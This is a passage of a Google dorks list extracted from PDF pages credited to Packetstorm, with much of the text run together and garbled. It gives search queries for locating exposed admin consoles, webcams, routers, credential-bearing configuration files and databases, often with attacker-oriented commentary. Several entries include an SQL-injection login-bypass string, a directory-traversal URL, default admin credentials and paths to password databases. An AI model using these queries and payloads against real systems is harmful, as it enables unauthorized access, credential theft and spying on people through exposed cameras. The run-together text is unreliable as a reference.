intext:"powered byWeb Wiz Journal"

intext:"powered by Web WizJournal"

Web Wiz Journal ASP Blog. The MDBdatabase is mostly unprotected and canbe downloaded directly. The DBcontains administrativeacccountsfilename: journal.mdbadminlogin: admin.html

intitle:"vhost"intext:"vHost .2000-2004"

intitle:"vhost" intext:"vHost . 2000-2004"

vHost is a one-step solution for allvirtual hosting needs. It enables aLinux/BSD server with single ormultiple IP addresses to function asunlimited virtual hosts with HTTP,FTP, SMTP, POP3, IMAP, and othervirtual services extentable via modules.

Page 142: Packetstorm Google Dorks List

It comes with both command-line andweb-based graphical user interfaces,which give maximum control to adomain's owner, while relieving thesystem administrator of most routineadministration tasks.

intitle:"start.managing.the.device"remote pbx acc

intitle:"start.managing.the.device"remote pbx acc

MCK Communications,Inc.PBXgatewayIIHigh density centralsite gateway for remote PBXaccess(MCK Communications is nowknown as VESO.)

allintext:"Poweredby LionMaxSoftware" "WWWFile Share"

allintext:"Powered by LionMaxSoftware" "WWW File Share"

WWW File Share Pro is a small HTTPserver that can help you share files withyour friends. They can download filesfrom your computer or upload filesfrom theirs. Simply specify a directoryfor downloads and a directory foruploads. All servers can be accessedanonymously

ext:dat bpk.dat ext:dat bpk.dat

Perfect Keylogger is as the name says akeylogger :)This dork finds thecorresponding datafiles which can beread with the free downloadable liteversion.

intitle:"iVISTA.Main.Page" intitle:"iVISTA.Main.Page"

And again another webcam search.MOst of these cams seem to be securitycams

inurl:2506/jana-admin inurl:2506/jana-admin

The JanaServer 2 is amongst otherthings a proxy server, that makes itpossible for LAN members, everyoneor a group as a part of the LAN, toaccess the internet via a Modem, ISDNor DSL connection. For this theprogram must be installed on thecomputer, that can access the internetby an installed modem, ISDN or a DSLadapter.

intitle:"SpamFirewall"inurl:"8000/cgi-bin/index.cgi"

intitle:"Spam Firewall"inurl:"8000/cgi-bin/index.cgi"

The Barracuda Spam Firewall is anintegrated hardware and softwaresolution for complete protection ofyour email server. It provides apowerful, easy to use, and affordablesolution to eliminating spam and virusfrom your organization.

Page 143: Packetstorm Google Dorks List

inurl:ds.py inurl:ds.py

Affordable Web-based document andcontent management application letsbusinesses of every size rapidly deploya world-class Enterprise ContentManagement (ECM) solution to helpreduce costs, optimize informationflow, and reduce risk

inurl:"1220/parse_xml.cgi?" inurl:"1220/parse_xml.cgi?"

Quicktime streaming server isuhhhhh.....well it's a streaming serverand it can be managed via http. Noneed to say more. Darwin StreamingServer is the opensource version (for*NUX os's).Some are pass protected,others not.

intext:"Welcometo the WebV.Networks"intitle:"V.Networks [Top]" -filetype:htm

intext:"Welcome to the WebV.Networks" intitle:"V.Networks[Top]" -filetype:htm

see and control JVC webcameras, youcan move the camera, zoom... changethe settings, etc....

intitle:"WebLogicServer"intitle:"ConsoleLogin"inurl:console

intitle:"WebLogic Server"intitle:"Console Login"inurl:console

BEA WebLogic Server 8.1 provides anindustrial-strength applicationinfrastructure for developing,integrating, securing, and managingdistributed service-orientedapplications. By simplifying andunifying the enterprise infrastructure,IT organizations can now delivergreater value in less time, at reducedcost to the overall business.

ext:confinurl:rsyncd.conf -cvs -man

ext:conf inurl:rsyncd.conf -cvs -man

rsync is an open source utility thatprovides fast incremental filetransfer.rsync can also talk to "rsyncservers" which can provide anonymousor authenticated rsync.Theconfiguration files contain data aboutpeers and paths

inurl:"phpOracleAdmin/php" -download -cvs

inurl:"phpOracleAdmin/php" -download -cvs

phpOracleAdmin is intended to be awebbased Oracle Object Manager.Inmany points alike phpMyAdmin, itshould offer more comfort andpossibilities. Interestingly thesemanagers are not password protected.

inurl:1810 "Oracle inurl:1810 "Oracle Enterprise Enterprise Manager 10g Grid Control

Page 144: Packetstorm Google Dorks List

EnterpriseManager"

Manager" provides a single tool that can monitorand manage not only every Oraclesoftware element in your grid, but alsoWeb applications, hosts, and thenetwork in between. Grid Control isalso extensible via an SDK socustomers can use it to monitoradditional components that are notsupported out-of-the box.

"Powered byInvision PowerFile Manager"(inurl:login.php) |(intitle:"Browsingdirectory /" )

"Powered by Invision Power FileManager" (inurl:login.php) |(intitle:"Browsing directory /" )

Invision Power File Manager is apopular file management script, writtenin the popular PHP ScriptingLanguage. It is compatiable with allforms of Unix and Windows andallows the user to control their files viaany modern browser.

ext:phpintext:"Poweredby phpNewManVersion"

ext:php intext:"Powered byphpNewMan Version"

PHP News Manager is a multi-platformcompatible solution for managingwebsites and multi-user access.Features weekly poll management,gallery management, partners listmanagement, public news support, anda lot more. PHP News Manager isvulnerable to a directory traversalproblem.path/to/news/browse.php?clang=../../../../../../file/i/want

intitle:"Cayman-DSL.home" intitle:"Cayman-DSL.home"

Cayman DSL modems. Many Caymanunits have a weakness where even ifremote administration is disabled, someolder firmwares will still allowvalidation if proper login credentialsare supplied. In many cases, simplyhitting enter will be enough toauthenticate. It's worth noting, many ofthe vulnerable devices also supporttelnet right out of the box, as opposedto the linksys models which require afirmware patch.

intitle:"Index of/CFIDE/"administrator

intitle:"Index of /CFIDE/"administrator

With ColdFusion, you can build anddeploy powerful web applications andweb services with far less training timeand fewer lines of code than ASP,PHP, and JSP.The search that pulls updirectory listings we probably shouldn't

Page 145: Packetstorm Google Dorks List

be seeing.. entering the 'administrator'directory brings up a ColdFusion loginscreen

intitle:"AthensAuthenticationPoint"

intitle:"Athens AuthenticationPoint"

Athens is an Access Managementsystem for controlling access to webbased subscription services. It offers: *secure single username access tomultiple web-based access controlledservices * devolved administrationfacilities at organisation level * remoteaccess user accounts * encryptedaccount bulk upload facilities *scalable services with 3 millionaccounts * replication facilities atseveral separate physical locations,offering a resilient authenticationservice

ext:ini eudora.ini ext:ini eudora.ini

Well, this is the configuration file forEudora...may contain sensitiveinformation like pop servers, loginsand encypted passwords sometimes.

inurl:preferences.ini "[emule]" inurl:preferences.ini "[emule]"

This finds the emule configuration filewhich contains some general and proxyinformation.Sometimes proxy user andpassword are stored.

intitle:index.ofabyss.conf intitle:index.of abyss.conf

These directories reveal theconfiguration file of the abysswebserver. These files can containpasswords.

intext:""BiTBOARD v2.0"BiTSHiFTERSBulletin Board"

intext:""BiTBOARD v2.0"BiTSHiFTERS Bulletin Board"

The bitboard2 is a board that need nodatabase to work. So it is useful forwebmaster that have no access to a sqldatabase. The password file can beretrieve from/admin/data_passwd.dat

intitle:"welcome.to.squeezebox" intitle:"welcome.to.squeezebox"

squeezebox is the easiest way formusic lovers to enjoy high-qualityplayback of their whole digital musiccollection. Stream music from yourcomputer to anywhere in your home.Works with iTunes and provides apowerful web interface for controlfrom any computer on yournetwork.This is neat, on top of givingout all sorts of enumeration

Page 146: Packetstorm Google Dorks List

information, it also allows one toparuse the music collection on the box,as well as listen if you install the aplet.Way cool.

allinurl:"/*/_vti_pvt/" |allinurl:"/*/_vti_cnf/"

allinurl:"/*/_vti_pvt/" |allinurl:"/*/_vti_cnf/"

Frontpage extensions for Unix ? So beit..

filetype:cnfinurl:_vti_pvtaccess.cnf

filetype:cnf inurl:_vti_pvtaccess.cnf

The access.cnf file is a "weconfigfile"(webconfig file) used by FrontpageExtentions for Unix. The install scriptcalled change_server.sh processesthem. These files leak informationabout the realm name and the full pathon the server for it.

inurl:"install/install.php" inurl:"install/install.php"

This searches for the install.php file.Most results will be a Bulletin boardlike Phpbb etc.This will let an attackerinstall the forum again. There is anexploit available on the Net which letsyou see DB info.

intitle:"index of"inurl:ftp (pub |incoming)

intitle:"index of" inurl:ftp (pub |incoming)

Adding "inurl:ftp (pub | incoming)" tothe "index.of" searches helps locatingftp websites. This query can easily benarrowed further with additionalkeywords.

filetype:blt"buddylist" filetype:blt "buddylist" AIM buddylists.

intitle:"index.of".diz .nfo lastmodified

intitle:"index.of" .diz .nfo lastmodified

File_id.diz is a description fileuploaders use to describe packagesuploaded to FTP sites. Although rootedin legitimacy, it is used largely bysoftware piracy groups to describe theirill gotten goods. Systemsadministrators finding file_id.diz indirectory listings on their servers maydiscover their boxes have been hackedand are being used as a distroubtionsite for pirated software. .nfo's oftencontain info on which piracy group thefiles have passed through on their wayto their final resting place. This helpsweed out false positives.

intitle:"Sipura.SP intitle:"Sipura.SPA.Configuration" - Query returns configuration pages for

Page 147: Packetstorm Google Dorks List

A.Configuration" -.pdf

.pdf online Voice over IP devices. Disclosesan obscene amount of informationabout the target, including most allrouting information and access tocontrol user's telephone system.

intitle:"Azureus :Java BitTorrentClient Tracker"

intitle:"Azureus : Java BitTorrentClient Tracker"

This query shows machines using theAzureus BitTorrent client's built-intracker - the pages are quite simple inthe information they give out, simply alist of active torrents.This informationmay be useful for people wanting tofind active BitTorrent trackers fordownloading .torrent files from, or forpeople wanting to find these trackers toshut them down :)

intitle:"BNBTTracker Info" intitle:"BNBT Tracker Info"

This query shows pages whichsummarise activity on BNBT-poweredBitTorrent trackers - including all thetorrents currently being "tracked", theBNBT software version, links to user-lists and 'admin' pages, etc.This isuseful to people who want to findactive BitTorrent trackers fordownloading - including ones whicharen't 'public'. It is also useful forpeople wanting to gain some clues intoa tracker's/site's setup. Some versionsof BNBT are also vulnerable to a DOSattack. People targetting BitTorrenttrackers because of the questionablelegality of their general usage may alsofind this query useful!

intitle:"PHPBTTracker Statistics" |intitle:"PHPBTTracker Statistics"

intitle:"PHPBTTracker Statistics" |intitle:"PHPBT Tracker Statistics"

This query shows pages whichsummarise activity on PHPBT-powered BitTorrent trackers - all thetorrents currently being "tracked".Thisis useful to people who want to findactive BitTorrent trackers fordownloading - including ones whicharen't 'public'. It is also useful forpeople wanting to gain some clues intoa tracker's/site's setup. Peopletargetting BitTorrent trackers becauseof the questionable legality of theirgeneral usage may also find this query

Page 148: Packetstorm Google Dorks List

useful!Often, the URL involved can bechanged to access the configuration /installation / deletion script.. which areobviously *not* intended for publicaccess, even if the statistics page is.

"Powered byWordPress" -htmlfiletype:php -demo-wordpress.org -bugtraq

"Powered by WordPress" -htmlfiletype:php -demo -wordpress.org -bugtraq

Query: "Powered by WordPress" -htmlfiletype:php -demo -wordpress.org -bugtraqBackground: WordPress is ablogging software which is vulnerableto a few SQL injectionqueries.http://securityfocus.com/bid/12066/exploit/

intitle:uploadinurl:uploadintext:upload -forum -shop -support -w3c

intitle:upload inurl:uploadintext:upload -forum -shop -support-w3c

The search reveals server uploadportals.An attacker can use serverspace for his own benefit.

intitle:"SpeedStream * ManagementInterface"

intitle:"SpeedStream * ManagementInterface" a lot of Speed stream routers :)

intitle:"HFS /"+"HttpFileServer" intitle:"HFS /" +"HttpFileServer"

"The HttpFileServer is a Java basedmechanism for providing web access toa set of files on a server. This is verysimilar to Apache Directory Indexingbut provides the ability to upload filesas well."http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=1516

inurl:"next_file=main_fs.htm"inurl:imginurl:image.cgi

inurl:"next_file=main_fs.htm"inurl:img inurl:image.cgi Linksys Wireless-G web cams.

"There are noAdministratorsAccounts"inurl:admin.php -mysql_fetch_row

"There are no AdministratorsAccounts" inurl:admin.php -mysql_fetch_row

This is a more specific search for thevulnerable PhpNuke index already seenon this website.PhpNuke asks you toset up an admin account when it is firstinstalled. This search is a list of peoplewho never set up that account! It willtake you directly to the administratorregistration of a vulnerable server. The-mysql_fetch_row will remove listingswhere SQL is simply broken.

filetype:ctt Contact filetype:ctt Contact This is for MSN Contact lists...

Page 149: Packetstorm Google Dorks List

Peoples MSNcontact lists filetype:ctt "msn"

This will give msn contact lists ..modify the "msn" to what ever you feelis messenger related

inurl:servlet/webacc inurl:servlet/webacc

I was playing around on the net when Ifound a small problem with Novell'sWebAcces. With User.lang you cangive in you're language as parameter Itried some different stuff there andwhen I tried so that the URL would behxxp://www.notsohappyserver.com/servlet/webacc?User.Lang="> this linkappeared I clicked it and so I foundunprotected dirs.Inhxxp://www.notsohappyserver.com/com/novell/webaccess/ is a file calledWebAccessUninstall.ini and this filecontains info like servernamesinstallationpaths and servers context

"Web FileBrowser" "Useregularexpression"

"Web File Browser" "Use regularexpression"

This will ask google to search for a phpscript used to manage files on a server.The script "Web File Browser" enablesusers to change files on the server. Thescript comes un-protected, whichmeans that anyone who knows theexact path of the php file can haveadmin access to files on that server.

intext:gmail inviteintext:http://gmail.google.com/gmail/a

intext:gmail inviteintext:http://gmail.google.com/gmail/a

This is a dork I did today. At first, Iwanted to find out the formula formaking one, but ... It got boring, so Ijust made a dork that finds invites. Ifyou want to get specific, try adding"+blog", "+livejournal", or , "+forum".

filetype:cgitranscoder.cgi filetype:cgi transcoder.cgi

Digital Video Recorder bySnapStream. It is possible onmisconfigured machines to streamvideo off these devices.

intitle:"SetupHome" "You willneed * log inbefore * * change* settings"

intitle:"Setup Home" "You willneed * log in before * * change *settings"

This should reveal Belkin routers.Interestingly, Belkin routers by defaulthave remote administration on, and actas a webserver for administration. Alsoby default, their password is blank (andthe login page helpfuly informs theattacker of this).Once he's in, there's allkinds of annoying stuff he could get

Page 150: Packetstorm Google Dorks List

into, and it could also be used moreblackhackishly to disable security.

"Index of" rar r01nfo Modified 2004

"Index of" rar r01 nfo Modified2004 New Warez Directory Lists

intitle:"NetworkPrint Server"filetype:shtm (inurl:u_printjobs |inurl:u_server |inurl:a_server |inurl:u_generalhelp | u_printjobs )

intitle:"Network Print Server"filetype:shtm ( inurl:u_printjobs |inurl:u_server | inurl:a_server |inurl:u_generalhelp | u_printjobs )

Axis Network Print Server devices.This search has all the possible urls(more than strictly needed), but thoseare added in case Google decides toindex them in the future.

intitle:"NetworkPrint Server"intext:"http://www.axis.com"filetype:shtm

intitle:"Network Print Server"intext:"http://www.axis.com"filetype:shtm

Axis Network Print Server devices (abetter shorter search).

"pcANYWHEREEXPRESS JavaClient"

"pcANYWHERE EXPRESS JavaClient"

This search will reveal the java scriptprogram that allows someone to accessPC Anywhere from, well, anywhere!This should primarily be considered asa frontdoor, as most PC Anywhereservers are password protected. Stillthis is extremely dangerous to haveexposed to the web.

inurl:"Activex/default.htm" "Demo" inurl:"Activex/default.htm" "Demo"

This search will reveal the active Xplugin page that allows someone toaccess PC Anywhere from, well,anywhere! This should primarily beconsidered as a frontdoor, as most PCAnywhere servers are passwordprotected. Still this is extremelydangerous to have exposed to the web.

intitle:"FTP rootat" intitle:"FTP root at"

This dork will return some FTP rootdirectories. The string can be mademore specific by adding additionalkeywords like password.

intitle:"VNCviewer for Java" intitle:"VNC viewer for Java"

VNC (Virtual Network Computing)allows a pc to be controlled remotelyover the Internet. These are thepassword protected but still shouldn'tbe allowed to be indexed by Google byaccident.

Page 151: Packetstorm Google Dorks List

filetype:torrenttorrent filetype:torrent torrent

Torrent files .. don't expect to findspectacular stuff with this kind ofstring, this just to shows you can useGoogle for all kinds of filetypes, notjust pdf or html..

inurl:"631/admin"(inurl:"op=*") |(intitle:CUPS)

inurl:"631/admin" (inurl:"op=*") |(intitle:CUPS)

Administration pages for CUPS, TheCommon UNIX Printing System. Mostare password protected.

PHPhotoalbumUpload

intitle:"PHPhotoalbum - Upload" |inurl:"PHPhotoalbum/upload"

Homepage:http://www.stoverud.com/PHPhotoalbum/PHPhotoalbum is a picturegalleryscript. You can upload pictures directlyfrom your webbrowser. The scriptgenerates thumbnails on the fly. Userscan comment each picture. Viewstatistics about the pictures. TopXXlist. Admin user can delete pictures,comments and albums.

PHPhotoalbumStatistics

inurl:PHPhotoalbum/statisticsintitle:"PHPhotoalbum - Statistics"

PHPhotoalbum is a picturegalleryscript. You can upload pictures directlyfrom your webbrowser. The scriptgenerates thumbnails on the fly. Userscan comment each picture. Viewstatistics about the pictures. TopXXlist. Admin user can delete pictures,comments and albums.

PhotoPost PHPUpload

-Logininurl:photopost/uploadphoto.php

PhotoPost was designed to help yougive your users exactly what they want.Your users will be thrilled to finally beable to upload and display their photosfor your entire community to view anddiscuss, all with no more effort than ittakes to post a text message to aforum.Over 3,500 web sites arepowered by PhotoPost today. Thesecustomers trusted our software tosimplify their lives as webmasters, andto meet the needs of their users.

uploadpics.php?did= -forumintext:Generated.by.phpix.1.0?inurl:$mode=album

intext:Generated.by.phpix.1.0?inurl:$mode=album

Product: PHPix Version: 1.0Vuln:Directory traversalPHPix is a Web-based photo album viewer written inPHP. It features automatic generationof thumbnails and different resolutionfiles for viewing on the fly. Synnergy

Page 152: Packetstorm Google Dorks List

Labs has found a flaw within PHPixthat allows a user to successfullytraverse the file system on a remotehost, allowing arbitrary files/folders tobe read.http://www.securiteam.com/unixfocus/6G00K0K04K.html

XAMPP"inurl:xampp/index"

XAMPP "inurl:xampp/index"

XAMPP is an easy to install Apachedistribution containing MySQL, PHPand Perl. XAMPP is really very easy toinstall and to use - just download,extract and start. At the moment thereare three XAMPP distributions.-allowsyou to write emails (mercury Mail)-some phpmyadmin are unprotected-security details of the server-maybesome more things ;-)

intitle:"BrowserLaunch Page" intitle:"Browser Launch Page" An ActiveX based webcam - so use

MS IEintext:"Mailadmins login hereto administrateyour domain."

intext:"Mail admins login here toadministrate your domain."

Another way to locate Postfix adminlogon pages.

inurl:citrix/metaframexp/default/login.asp?ClientDetection=On

inurl:citrix/metaframexp/default/login.asp? ClientDetection=On

Citrix (http://citrix.com) is a webapplication that allows remote accessvia a client for companies, institutions,and government agencies to"published" folders, files, drives, andapplications on the server and often theattached network. There is a XSSvulnerability in a widely used versionof their Web Interface. As reported onSecuriteam.com:http://www.securiteam.com/securitynews/6X0020K8VW.html A simple test is inlcluded in theadvisory.

ext:txt inurl:dxdiag ext:txt inurl:dxdiag

This will find text dumps of theDirectX Diag utility. It gives an outlineof the hardware of the computer, andgoes into quite a bit of detail listingdriver versions and such. I can't thinkof any serious security implacations ofthis data, but I'll leave it to yourimagination.

Page 153: Packetstorm Google Dorks List

inurl:"usysinfo?login=true" inurl:"usysinfo?login=true"

Dell OpenManage enables remoteexecution of tasks such as systemconfiguration, imaging, applicationinstallation and support. It also used totrack hardware and software inventory,to update configurations, drivers, OSand applications and to proactivelymonitor and correct faultconditionsDell OpenManage standardsinclude the Common InformationModel (CIM), Desktop ManagementInterface (DMI), Simple NetworkManagement Protocol (SNMP), andWired for Management(WfM).Another possible search for thisis:"Log in." inurl:1311/servlet/

inurl:"/NSearch/AdminServlet" inurl:"/NSearch/AdminServlet"

This search brings up results for NovellNetWare's Web Search Manager.. atbest the sites will be passwordprotected, at worst the site will requireno authentication - allowing fullcontrol over a site's 'virtual searchservers'.

"Netware * Home"inurl:nav.html "Netware * Home" inurl:nav.html

Rather than submitting varioussearches for all kinds of NetWarerelated pages, Novell NetWare's HomePage is a good place to start forprofiling the services available on aNetWare powered system. The resultswill often include all (or at least some)of the following links to differentservices on a system - including ServerCertificates, iFolder, iManager,NetStorage, Enterprise Web ServerManagement and the Web SearchManager!

intext:"ErrorMessage : Errorloading requiredlibraries."

intext:"Error Message : Errorloading required libraries."

This throws up pages which contain"CGI ERROR" reports - which includethe file (and line number) of the errorsoccurence, the version of Perl beingused, detailed server information (ofthe form "Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_ssl/2.8.12OpenSSL/0.9.6b DAV/1.0.3 PHP/4.3.2mod_perl/1.26"), usernames, setup file

Page 154: Packetstorm Google Dorks List

names, form / query information, portand path information, etc.. perfect forsystem-profiling!

ext:reg"username=*"putty

ext:reg "username=*" puttyPutty registry entries. Containusername and hostname pairs, as wellas type of session (sftp, xterm, etc).

allinurl:index.htm?cus?audio allinurl:index.htm?cus?audio

This will find webcams made bySweex, Orite and others. Supportsmotion detection, ftp, smtp and save to.avi. Needs ActiveX so works forIE/win only ..

intitle:"edna:streaming mp3 server"-forums

intitle:"edna:streaming mp3 server"-forums

Edna allows you to access your MP3collection from any networkedcomputer. This software streams yourMP3s via HTTP to any MP3 playerthat supports playing off a remoteconnection (e.g. Winamp, FreeAmp,Sonique, XMMS).Stats pages werefound (by klouw) with:"edna:*"intitle:"edna: Site Statistics"

intitle:"ePowerSwitch Login" intitle:"ePowerSwitch Login"

With ePowerSwitch D4 Guard, up tofour devices can be individuallyswitched on and off, also withprogrammed switching states. Theactivated Guard function ensuresexceptionally high equipmentavailability: continually monitorswhether the connected IP-baseddevices are still active, it canautomatically, without user input,reboot any crashed device.

ext:iniVersion=4.0.0.4password

ext:ini Version=4.0.0.4 password

The servU FTP Daemon ini filecontains setting and sessioninformation including usernames,passwords and more. This is a morespecific search for ServU passwordsbase on a previous dork by Cybercide.

inurl:orasso.wwsso_app_admin.ls_login

inurl:orasso.wwsso_app_admin.ls_login

Oracle provides a Single Sign-Onsolution which is quite widely spreadas it integrates quite seemlessly intoexisitng appllications (as Oraclesays).If the link itself shows an emptypage, try the directory below.

inurl:oraweb - inurl:oraweb -site:oraweb.org Oracle administrators tend to naming

Page 155: Packetstorm Google Dorks List

site:oraweb.org their servers ora* - maybe because theyforget the name of their database all thetime.So the Oracle webserver is veryoften named oraweb.

intitle:Group-Office "Enter yourusername andpassword to login"

intitle:Group-Office "Enter yourusername and password to login"

Group-Office is a Groupware suitecontaining a base system and differentmodules. The modules are designed ina way that groups of people cancollaborate online.

intitle:"EverFocus.EDSR.applet" intitle:"EverFocus.EDSR.applet"

The new EDSR-1600 (16-channel),EDSR-900 (9-channel) and EDSR-600(6-channel) digital video recordersoffer all digital video recordingbenefits and are easy to install andoperate like a custom VCR. Moreover,the 16 & 9 channel devices are the firstDigital Video Recorders with anintegrated 16x4 basic matrix function.Existing multiplexers can be connectedvia a switch output. Alarms aremanaged via external alarm inputs andoutputs.

inurl:netscape.ini inurl:netscape.ini

There's a bunch of interesting info innetscape.ini1. Viewers: whichmultimedia viewers the firm or peopleare using2.Cookies3.AddressBook4.Mail- If pop3 is used you willsee login and password. 5.Java - willtell the attacker if his victim has Javaenabled.6.URL History - The last sitesvisitedURL_1=http://edtech.xxxx.fi/URL_2=C:\Tx\ixxx_t3.htmURL_3=http://www.xxx.com/welcome/URL_4=http://xxx.netscape.com7.User TrustedExternal Applications

inurl:netscape.hst inurl:netscape.hstNetscape Bookmark List/History: Soan attacker would be able to locate thebookmark and history list

inurl:"bookmark.htm" inurl:"bookmark.htm" Bookmarks for Netscape and various

other browsers.

inurl:netscape.hst inurl:netscape.hst History for Netscape - So an attackercan read a user's browsing history.

"powered |performed by

"powered | performed by BeyondSecurity's Automated Scanning" -

This search finds Beyond Securityreports. Beyond Security sells a box

Page 156: Packetstorm Google Dorks List

Beyond Security'sAutomatedScanning" -kazaa -example

kazaa -example which performs automated testing (theproduct is based on Nessus). TheBeyond Security report will help anattacker find vulnerabile services at theattackees site.This dork was found byJamuse. A cleanup was done byWolveso. Please note: Both current(feb 2005) results are verifiable assamples - they're linked from pages onthe sites they belong to, as samplereports. But you never know whenGoogle might find some real one's toplay with ?!

intitle:"EpsonNetWebAssist Rev" intitle:"EpsonNet WebAssist Rev" This reveals the Epson Web Assist

page (internal to the machine)

"SquirrelMailversion 1.4.4"inurl:src ext:php

"SquirrelMail version 1.4.4"inurl:src ext:php

date :Jan 30 2005 this search reveal thesrc/webmail.php which would allowacrafted URL to include a remote webpage. This was assigned CAN-2005-0103by the Common Vulnerabilitiesand Exposures.-what can possibly bedone :*A possible cross site scriptingissue exists in src/webmail.php thatisonly accessible when the PHPinstallation is running withregister_globalsset to On.*A possiblelocal file inclusion issue was uncoveredby one of ourdevelopers involvingcustom preference handlers. This issueis onlyactive if the PHP installation isrunning with register_globals set to On.

inurl:na_admin inurl:na_admin

This searches for the admin pages for a"Network Appliance" box. Anauthenticated user could get access to atheir data - all of it, in fact up to 100'sTb of it. This is also part of cgiscanning tools like:http://www.cirt.net/nikto/UPDATES/1.34/scan_database.db

intitle:"ConnectionStatus"intext:"Currentlogin"

intitle:"Connection Status"intext:"Current login"

This is an intriguing way of findingvarious '5861 DMT Routers' - thepresence of a web-interface to therouter also indicates the presence of atelnet interface to the router!

Page 157: Packetstorm Google Dorks List

intitle:"welcome tonetware *" -site:novell.com

intitle:"welcome to netware *" -site:novell.com

Novell login portals offering variousservices storage, printing, email orLDAP access

intitle:"Brother"intext:"ViewConfiguration"intext:"BrotherIndustries, Ltd."

intitle:"Brother" intext:"ViewConfiguration" intext:"BrotherIndustries, Ltd."

Finds a real bunch of Brother printers

filetype:incmysql_connect ORmysql_pconnect

filetype:inc mysql_connect ORmysql_pconnect

INC files have PHP code within themthat contain unencrypted usernames,passwords, and addresses for thecorresponding databases. Verydangerous stuff. The mysql_connectfile is especially dangerous because ithandles the actual connection andauthentication with the database.

"IceWarp WebMail 5.3.0""Powered byIceWarp"

"IceWarp Web Mail 5.3.0""Powered by IceWarp"

IceWarp Web Mail 5.3.0Multiplecross-site scripting and HTMLinjectionvulnerabilities.http://www.securityfocus.com/bid/12396/

"Powered byDUpaypal" -site:duware.com

"Powered by DUpaypal" -site:duware.com

Here is another DUware product,DUpaypal. Once you get hold of thedatabase it contains the adminusername and password. The default bythe way is admin/passwordThe defaultlocation for the database is../_private/DUpaypal.mdb

-site:php.net -"ThePHP Group"inurl:sourceinurl:url ext:pHp

-site:php.net -"The PHP Group"inurl:source inurl:url ext:pHp

scripts to view the source code of PHPscripts running on the server. Can bevery interesting if it is also allowed toopen configuration files ;-)

intitle:"switchlogin" "IBM FastEthernet Desktop"

intitle:"switch login" "IBM FastEthernet Desktop"

IBM 8275 Model 416 HighPerformance Ethernet WorkgroupSwitch

"Powered by LinkDepartment" "Powered by Link Department"

Link management script with advancedyet easy to use admin control panel,fully template driven appearance, staticHTML front-end and emailnotifications.Below the link list afolder 'ld' exists which contains variousjuicy information like encrypted adminpasswords and session data.

Page 158: Packetstorm Google Dorks List

"Powered byMercuryBoard[v1"

"Powered by MercuryBoard [v1"

Exploit forMercuryBoard:http://www.securityfocus.com/archive/1/389881/2005-02-06/2005-02-12/0Enter the followingsearch:"Powered by MercuryBoard[v1"And the exploit does work!

intitle:"Index of"sc_serv.confsc_serv content

intitle:"Index of" sc_serv.confsc_serv content

This dork lists sc_serv.conf files. Thesefiles contain information for Shoutcastservers and often contain cleartextpasswords.Original dork: filetype:confsc_serv.confCleaned by: c0wzCleandate: 2005-04-26

intitle:"welcome tomono xsp" intitle:"welcome to mono xsp"

XSD is the demo webserver for theMono project and allows the executionof ASP.NET on Unix

intitle:"DEFAULT_CONFIG - HP" intitle:"DEFAULT_CONFIG - HP" High scalable Ethernet switches by HP

running in the default configurationintitle:"web serverstatus" SSH Telnet

intitle:"web server status" SSHTelnet

simple port scanners for most commonports

intitle:opengroupware.org "resistanceis obsolete""Report Bugs""Username""password"

intitle:opengroupware.org"resistance is obsolete" "ReportBugs" "Username" "password"

Open groupware is a comprehensiveopen source groupware project runningon all major platforms.

intitle:Linksyssite:ourlinksys.com

intitle:Linksys site:ourlinksys.com Ourlinksys.com DDNS entries pointingto Linksys web enabled cameras

intitle:"supervisioncam protocol" intitle:"supervisioncam protocol"

"SupervisionCam captures andcompares images from video cameras,(internet) image files or the computerscreen at intervals you define. It startsoptional activities when a movement isdetected."

inurl:getmsg.htmlintitle:hotmail inurl:getmsg.html intitle:hotmail

These pages contain hotmail messagesthat were saved as HTML. Thesemessages can contain anything frompersonal data to cleartext passwords.

"delete entries"inurl:admin/delete.asp

"delete entries"inurl:admin/delete.asp

As described in OSVDB article#13715:"AspJar contains a flaw thatmay allow a malicious user to deletearbitrary messages. The issue istriggered when the authentication

Page 159: Packetstorm Google Dorks List

method is bypassed and/admin/delete.asp is accessed directly.It is possible that the flaw may allow amalicious user to delete messagesresulting in a loss of integrity."Thecompany supporting this software is nolonger in business and the software isno longer being updated. Therefore,versions should not matter in this dork.

inurl:camctrl.cgi inurl:camctrl.cgi Vivotec web cams

allintitle:Brains,Corp. camera allintitle:Brains, Corp. camera

mmEye webcam / cam servermmEye isa multifunction multimedia serverequipped with 32bit RISC CPU SH-3,and runs UNIX operating system(NetBSD).It has video input ports (1 Ssignal port, 2 composite signal ports)and PCMCIA Type II slots built in.

"Traffic Analysisfor" "RMON Port* on unit *"

"Traffic Analysis for" "RMON Port* on unit *"

List of RMON ports produced byMRTG which is a network trafficanalysis tool. See also #198

allintitle:aspjar.com guestbook allintitle:aspjar.com guestbook

"An input validation vulnerability wasreported in the ASPJar guestbook. Aremote user can gain administrativeaccess and can delete guestbookmessages.The '/admin/login.asp' scriptdoes not properly validate user-supplied input in the password field. Aremote user can supply the followingcharacters in password field to injectSQL commands and be authenticatedas the administrator:"' or ''='I alsofound another vulnerability that hasn'tbeen documented anywhere. Using theabove search to find aspjar guestbooks,appending the guestbook directory with/data/guest.mdb will give you adatabase containing the plaintextusername and password for theguestbook admin and all entries in theguestbook, including IP addresses ofusers.(This company is no longer inbusiness and the software is no longerbeing updated so versions shouldn'tmatter)

Page 160: Packetstorm Google Dorks List

filetype:sql("values * MD5" |"values *password" |"values * encrypt")

filetype:sql ("values * MD5" |"values * password" | "values *encrypt")

Locate insert statements making use ofsome builtin function to encrypt apassword. PASSWORD(),ENCRYPT() and MD5() are searched.

filetype:sql("passwd values" |"password values"| "pass values" )

filetype:sql ("passwd values" |"password values" | "pass values" )

Find insert statements where the field(or table name) preceding the operatorVALUES will be 'password' or'passwd' or 'pass'. The rest of thestatement should contain encrypted orplaintext password.An attacker can usethese files to acquire databasepermissions that normally would not begiven to the masses.

(inurl:81-cobalt |inurl:cgi-bin/.cobalt)

(inurl:81-cobalt | inurl:cgi-bin/.cobalt) Cobal RaQ internal pages

inurl:WCP_USER inurl:WCP_USER

WebConnect is client-server basedsoftware that provides secure browserbased emulation to mainframe,midrange and UNIX systems

intitle:"Dell LaserPrinter" ews intitle:"Dell Laser Printer" ews

Finds Dell's printers with EWS.EWS :Embedded Web Server technologyenables the usage of a standard webbrowser to manage many aspects of theprinter, for example, view consumablelife, configure network parameters,view serial number information, printerusage etc..

intitle:"KurantCorporationStoreSense"filetype:bok

intitle:"Kurant CorporationStoreSense" filetype:bok

These are Kurant StoreSense adminlogon pages.

intitle:"activewebcam page" intitle:"active webcam page"

